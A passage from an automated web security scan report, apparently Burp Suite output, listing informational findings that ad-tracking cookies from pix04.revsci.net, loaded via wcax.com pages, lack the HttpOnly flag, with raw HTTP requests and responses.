User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBbwIMV594t637ir85zA1Wc7IaEiIBFXxvHO1ZKic5ngYCBQF0q7tfEV6W8KaQp8dAvSusER0hEoZjgIoA2FbRoQEvNoVutDtItom6EzbfSVHF/SxGtsi7JLpXBbxV4+nFIdqzXHgEf9oWZ5RJC3ujSffAwU6kkmlxpZkNgKVDxHs2h6ZgtVUmsdob5hq0Nqcqao5UL6XWdwSFR8rKSfMbsG8gfniLsWRrEUd/iiaO7e2qi1BJoGWx3uN5y/9erGbqkBIWdtK9ieRmJ7990bPhloxqouJEJEY=; rtc_JX9b=MLsvrlMusR9jJhHokT9c+IVabtHZzAlfbNtEAmBKZKi5zmNwJhnNeeI4S3b9+hGezmW6Ln0geKBlbrcD9OYDgK5xvRPSmd7E1skkGXtt39bVkBro3/pDJa7WtDpg0n9cK4HLy4PHUYL1qMfvwh6zBTmD3Tq9NcAIrEtRlTLPCVbK4plliAKP6Y1urMVfrK62r1eudYR8l3obNBin+Or1YJCSDLQfDawKE9I3kayv/2L6/OC7EWPIBhcON6NJ0bIQqRR3v9/Y746x7pnadu2KsTdZy9q2LOFaWoIJtemMbkH1yuBwAb2guPh/3EOUW7OJX/dQmLFuaLrE4L2+pzoJlemdndndT5pL3c6dEK1xmqH5NqHj7jqZ3mTtgdw9hH6MmWCujWIOFzZ+sL6cffx50HMJYddjfuKz2MX0KrTWut04fMIbTsVx2/63U4IAYZhnA8KXaw==; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_JX9b=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDO6ETU6ge19nKCDeVRxV0pPvV/yUINBxjwRSIohEK6pw26DoqIz+utPOu4WWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAjOlM2xcQOksDHwXF2Fqgcy5SfDDVrBFONjAMusqbzpvfiwUgkDpQKdICnPofZ0FXwrodLaUb+r1rjWhgCA2Nye/XTLzFcKnkSlZ20bnJkJ2lCVKM67FdTd5TpTfsM3PTq9Msu+BrJVix0x9rmPJ08w7B68DW1uHow==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:35:52 GMT; Path=/
Set-Cookie: rtc_VLqa=MLsv8VUucT5jZiikOEcU9ETXogUC0zg5ozNC5TZsQpoZ1XM0c3poC/S8o6gL3dmLNudZyUEHBSAy9DbqYRishsAluZLfFyPHoW8OnSeutlPGT/9/yatZEYhKP0fsjK91LGefXs0IFtIUglN4VvEbdB94gnJik9VR3JwBRtB0k+C4P5UtnEKeKpV1g0Rv83740nXMV7YE/uPDtQFbm0Q8eV1Zd0GXuQK0nT7WirXZJe/V8mV9ZUoEyHl5odcfSkb+K6JNo78s6B8lVwS+1OK8yjE3ld42puQDa4oRtNPsj+tg+8uNeC31TvLQNYMxtN08pZU9Wwz7+Y02P0GKlzuW58YZ2ax+coZLrUgBLDwxwmi/FcTAEueywLNduv7UFNzWsaqmVoy0obcSI0s1HsFhhRgiluSuLojCnYPs3wnFuu3sguAbpZ24bo2l84IPd51AxF5VgN5/; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:35:52 GMT; Path=/
X-Proc-ms: 25
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:35:52 GMT
Content-Length: 503

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','E05511_10424','D08734_72076','D08734_72077','D08734_72082'
...[SNIP]...
6.136. http://pix04.revsci.net/E05511/b3/0/3/0902121/64495114.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/64495114.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/64495114.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D452989%2526affname%253DWCAX%2526adtag%253DPromotion%252525201%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D189321%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF50OBL3IQT7uItGE2XZ+B7gFWE6TaYgYB7RmojcJSum2NZ/Do4j9p9LQR/PMkrTXt7zuDC1rEEqU0EZdFENKKsJ+cP1DW5sfX9JRD2sOsMwrvKRruw2D0aUM8HqYeBaSkzgIPkJtKTgDSBYiT8mIKnckuID1we0jFlLnRA9be3pGTRoPQDOuDisXq8kDcQnkQckIN+yh/2OGL+8YVUWs7iJsuME+D1mHxR9zY5V8QrjW5fpkDdPiKZ7t7JMDZC5V0Is9yrhpyHVj9gkK0fqe6GXsu+W/pZ3mf9JXBkEAqAWtol27/FBxFGAF5C0w=; rtc_NqMU=MLsv7iUucA5nprADoxMUZ9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBOpPrdSk21eU9Lpyn2txgsRP0c/xxljHTX7BOLqY4BgQCs3lhGEmvvtSk5ED4MMDjv8yVDLYK7pDAruXeuMbqWcYC2y8NbEmpQplW1r3QCDBMDKlKs8h8jhookQYAMg5VB8aLCKuUNtwB34ZoQt95cCo91UbMwGaFSr6asrq672fdH+xzIkZMRNy3EgFEOFuAASeQu0Vmfb3m3aVzU53rLUI0DvmE+6V5MRfJFqiXP3mwBN1JQOHtAvauFYtPfu791mq8kh/67bj1dtkYfONjJz46HXLiLXT9vUqTOR8dIMLhwh5QgSMzCmH/uFvWfD3l3pX8QaFC1vCAqFk8T34QxWHhhMKOHgnb4Ef8/sjmrJ7cwLNcYjHKHaF1zK4a+nl+D77j2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_NqMU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDq2qIWKwAWMjKCDeVRxV0pHs7MiO0UzrToS2ouz039v0EpRxSyNYjSDa1pMRxZm3WVajTlS++7eQSt8yWAsT4ruDEtDIgwnlax8clE90i4ZyJB7xtKSp/S7ZTUe74Q4eRuqh+fxVKV20za50CA1lADf2azroO0f1gGfeteIkb6zsAIeihQRxK/nexzALoxJRiiGYFrCmrA4TzLrU2qZBMsuixEnVIP+5Vw9zfmsNGyedq/kgi0AUeyzWOzWwmpHYzknGbX0FfHJPLDj3Dwxwv86xYW5QDnUddcVNKPwwQlMyCaE0=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:02 GMT; Path=/
Set-Cookie: rtc_H5uf=MLsv8SUucA5nprADwxMUZdS30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFepPrNSkm1eU9Lpin2xzgwRP18/xxpkNoVxqc5g0K0i0fqu3Z4OZ9TCWukp+fzOXqRG+FbCpZ1lNWeSoRp4pvl4W6xqmQFwWU4O5lr/3fAwOzCWOZFcV4p1IbmF2CVroSv3ekRCrxTkn5Gj5BfK6lws/9BSK4R70kIxYgnwBeKw5gxrJ3HWM6FdzLDP5HzR2IBwJkmQi2PJ2/xBDCzSRK2+IWaGVbp6A4vS07+Pp50Hceyamh9kzCVl5fXWYJfEHo3UDxtErrqNDBNGococWXvmK9Mn9/Q6WuUqV6V5eL076M1x6tZ+Kt2nJxiCiipnhEvR401rHK3bALb6xPrlKqYCmmWIf+v0EeQWP5MoKcUvGL45sV23Lj6SqCX5B1KhaG/GlEdpdM=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:02 GMT; Path=/
X-Proc-ms: 27
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 13:16:01 GMT
Content-Length: 653

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
6.137. http://pix04.revsci.net/E05511/b3/0/3/0902121/695595891.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/695595891.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/695595891.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%2526affname%253DWCAX%2526adtag%253DCommunity%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc2dfbd&0&&4d9d2f40&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; rsi_segs_1000000=pUPFOEOBLwIMVp8ceRM3WRl5l/8VdUUz9mYkDWlJfp5AoQ4NFluEUw2hr80cgj7G6Lq6eb2pifkgIl3hQFaWH4wAGfONd0AxNl9R4r24yg2IkXClwXqAex+KgbymzZmFm7jteB85NWCbzH30/LfD/5dGBfMl/lQilsQgCYbOhR/TOqs1CzTmsIjI85HYclwwLOuQEfKTLuS03/PsSzK2NZvgGTGBipaU0me8Y2ECBHtO6EXAgsL4DqCjgpN2N81wsxrp5ROQWKOWK5txk+NIHnk=; rtc_A1DH=MLsv7tUvsW9npigQh+m6PS9pIDm9YCrv+PJNecGjhxSUI1bCZ8Ri9PlaJ0eYwhF0dD57GtlzTWSLIXg3Y98VhJqU2IQZmMvmGuG9Jx5GJCMAKT9/9DCsOSrrzmmNaIkcQa83G6V7noY9MwAXfdgQgHVd/8ZT6oL5hwebdaMLK/91t2b/aRBabBZSk3tfHbOX1PK+XO36gnb2K3GZDddDK0R7j3WozV2g0OuzMO7KRVs5DYCIxULFxn28fZG0HT8WlUPkgbCcFK+aNbesM2ofG2rjFFYrX15lLAWfw+XPAPKPbZ3vEr5hBiSTVq2UpdmEVM0jExfX+kj25CPQeNDSfQt7H06cIGryO9V8q9VcDuXXy3+aY5RHWklTcyvTVQz9kggexx1fvkeTIHKTZhc4z7U=; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_A1DH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOEOFrwIUl63R0Pblm12emcUQW0uQVITAEXBTSyBcnze5Uw5zMF+oiR038qk3yDoup/8jHveuED0BkkfjgI/s+6FOZTFaCP8ymrzcvkjLdnBnw+D8fOutzdt7YCgZNo/SwenFUb53VA5AT1SyI+t59FBa/YaeYfbe0oUXLfLhw0E+RZjw5yl9y/QdhhUVf05O9AfU2w2WWwbhhIBDW3jAt5Jf2rSQWR6vzaOlKHLsdr6msjPXvCMGVTLcKDJsyqXlqYl472HA5KGaJ0FclfgsGbZGyJBd; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:05 GMT; Path=/
Set-Cookie: rtc_SOnt=MLsvr1UucS5jJxFcgo4AHK1+XkG5rAlP/Aq7SD8BxfGVHQohJ6FrqzzS13LtwLGPNU614wt1b+MA5RJdLaRrQUnmpA7Dn8HsEBQ22XijZ0avgB0uN3VFJc64A0JJWRHRyM1PJ99bh6wdpsfpwx4TBTmD3T+5LQCgxpcHmMgHZ8wIf5AXPQBlECGUWObVTp2Wl2qTjza4WAnSDu2o+g30biDqE3K7+WYa4uP79fIQxTnzUkcD2C2lBhcwN6MpTkcpeY7mSvqGCBrNPjyYsVMWxl5QK8tfyjKMF+FnU4w5VEBlKqw9THqvw7/hMLzC7Yn7urpFhINBgaNR6S81tE7rvXjW74KR31Dequ7esAsSMNxolukA9NP8blDzaV5mTOn/iSbi2cjC8JofbZ+Fcqks+HS7qUoBl5mk9dKKa7qhzXQ=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:05 GMT; Path=/
Set-Cookie: NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Sat, 07-May-2011 12:34:05 GMT; Path=/
X-Proc-ms: 23
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:34:04 GMT
Content-Length: 413

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_72076','D08734_72077','D08734_72082','E05511_50085'
...[SNIP]...
6.138. http://pix04.revsci.net/E05511/b3/0/3/0902121/699418016.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/699418016.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/699418016.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D465801%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
